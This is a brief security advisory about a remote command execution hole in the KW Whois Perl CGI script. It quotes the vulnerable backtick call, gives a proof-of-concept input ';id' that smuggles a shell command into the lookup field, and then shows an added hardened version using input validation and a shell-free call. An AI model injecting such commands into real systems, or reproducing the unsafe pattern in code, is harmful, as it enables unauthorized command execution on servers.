KW Whois Remote Command Execution Vulnerability
Unsafe code:
$site = $query->param('whois');
....
$app = `whois $site`;
print "$app .......
Proof of concept:
Type ";id" (without the quotes) into the input box.
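A hardened form of the lookup above, as an added example that is not part of the original advisory or KW Whois's own code: the `whois` parameter is checked against an allowlist, and the whois client is started without a shell. The helper names `valid_target` and `run_whois`, the 253-character limit and the text/plain response are assumptions made for this example.

```perl
#!/usr/bin/perl
# Added example: hardened replacement for the backtick call shown above.
use strict;
use warnings;
use CGI;

# Allowlist check: host names and IP addresses only (letters, digits,
# dot, hyphen, colon). The first character must be alphanumeric, so the
# value can never be read by whois as a command-line option.
# The input ";id" from the proof of concept fails here because ';' is
# not in the allowed set.
sub valid_target {
    my ($t) = @_;
    return defined $t
        && length($t) <= 253
        && $t =~ /\A[A-Za-z0-9][A-Za-z0-9.:-]*\z/;
}

# Start whois with a list-form pipe open. No shell is involved, so the
# target reaches whois as a single argument and characters such as
# ';', '|' or '`' have no special meaning even if validation is bypassed.
sub run_whois {
    my ($target) = @_;
    open(my $fh, '-|', 'whois', $target) or return;
    local $/;                 # slurp the whole output
    my $out = <$fh>;
    close $fh;
    return $out;
}

my $query = CGI->new;
my $site  = $query->param('whois');

# text/plain keeps whois output from being interpreted as HTML.
print $query->header('text/plain');

if (valid_target($site)) {
    my $app = run_whois($site);
    print defined $app ? $app : "whois lookup failed\n";
} else {
    print "Invalid host name or address\n";
}
```

Either control alone blocks the shell metacharacter case; keeping both means a later change to the regular expression does not reopen command execution.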
Copyright 2010, SecurityFocus